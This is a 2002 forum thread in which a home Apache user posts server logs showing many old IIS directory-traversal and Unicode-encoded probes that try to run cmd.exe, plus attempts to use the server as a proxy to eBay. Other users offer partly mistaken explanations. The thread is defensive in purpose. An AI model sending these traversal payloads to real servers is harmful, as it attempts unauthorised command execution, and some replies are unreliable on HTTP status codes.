| Forum Home | ||||
| Press F1 | ||||
| Thread ID: 18793 | 2002-05-02 09:38:00 | is someone trying to hack into my server or what? logs provided. | Guest (0) | Press F1 |
| Post ID | Timestamp | Content | User | ||
| 46797 | 2002-05-02 09:38:00 | Im running apache for windows on a 98SE pentium machine, i had a look at my server logs and am bewildered, and out of my depth. Someone keeps trying to make the strangest of requests, same pattern, not always the same IP.. Im not sure weather to be concerned, but here they are: 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:39 +1200] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:40 +1200] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:43 +1200] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:43 +1200] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:43 +1200] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:43 +1200] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 775 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:45 +1200] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:45 +1200] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 702 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:45 +1200] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 702 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:46 +1200] 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:46 +1200] 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:29 +1200] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:30 +1200] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:30 +1200] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:31 +1200] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:31 +1200] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:32 +1200] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:32 +1200] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:33 +1200] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:33 +1200] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:33 +1200] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 775 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:34 +1200] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:34 +1200] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:35 +1200] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 702 202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:35 +1200] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 702 61.157.252.242 - - [02/May/2002:15:10:15 +1200] 'GET www.ebay.com/ HTTP 200 2660 61.157.252.242 - - [02/May/2002:15:12:21 +1200] 'GET www.ebay.com/ HTTP 200 2660 The last one also has me confused as it would appear that someone managed to access ebay via me, which i assume is impossable.. |
Guest (0) | ||
| 46798 | 2002-05-02 21:53:00 | I've seen this activity before. Those requests that are being made are used to see your directory and content inside. I am not sure how they exploit what they see though but it is of a concern. I know they can't download the files without it being corrupt (I think) so that is safe but maybe they can execute a file or something. | Guest (0) | ||
| 46799 | 2002-05-02 22:34:00 | This particular customer then went through the same dance at 15:12, followed again by what appears to be 61.157.252.242 accessing www.e-bay.com (still utterly confused by that one, given that i am not e-bay) Any clues and security seggestions would be welcomed! Thanx. | Guest (0) | ||
| 46800 | 2002-05-03 04:51:00 | They have been trying. Very trying. You seem to be OK, the code 404 shows that they weren't able to get to the system directories. The ebay entries show an attempt to use you as a forwarder. I'm not sure what code 200 means -- but I *think* it is an error. Non-error codes are 0xx, I seem to remember. You must have been lucky with the default security settings. |
Guest (0) | ||
| 46801 | 2002-05-03 08:34:00 | '200' is the normal serving of a file, a non-error. At least it is when it is the serving of what is usually requested. This 'trying to get in' that i displayed is only the tip of the iceberg, there is so much of this pattern, and from so many IP addresses, many of which are like me are cable.paradise.net.nz If anyone wants to have a look, rather than post the whole thing here, i have put day 1 till 2 may here: www.something.net.nz It amazes me, the site isn't even anounced or finished yet, but i am allready getting people/viri attempting to abuse my server! |
Guest (0) | ||
| 46802 | 2002-05-03 22:21:00 | '200' is the normal serving of a file, a non-error. At least it is when it is the serving of what is usually requested. This 'trying to get in' that i displayed is only the tip of the iceberg, there is so much of this pattern, and from so many IP addresses, many of which are like me are cable.paradise.net.nz If anyone wants to have a look, rather than post the whole thing here, i have put day 1 till 2 may here: www.something.net.nz It amazes me, the site isn't even anounced or finished yet, but i am allready getting people/viri attempting to abuse my server! |
Guest (0) | ||
| 46803 | 2002-05-04 08:28:00 | A little research into to odditys coming up on my logs shows me that if i was running a microsoft server on a microsoft OS without all the latest bandaids, i would probably be in trouble by now, however, seeing i am running apache, i am 'probably' allright, even though the OS is 98SE. I still feel uneasy. However, there must be LOTS of people out there proudly running 'all microsoft' web servers without thier band aids, whose servers are waisting = thier bandwidth trying to mess up other servers, and grind the entire internet into something sluggier than a slug. While i have no plans to shut the server down yet, i want to buy a CHEAP machine to sit in the corner of my office, and take over that task for me. There are only 3 specifications. 1.Cheap 2.All hardware linux compatable. 3.New enough to support newer large drives (80 gig) as i also need to solve my storage problems 4. (yes i know i said 3) I dont need a monitor. I have a really nasty 14' monitor that will be fine for this purpose. .... Anyone want to sell me such a machine, or perhaps the componants to put such a machine together??? |
Guest (0) | ||
| 1 | |||||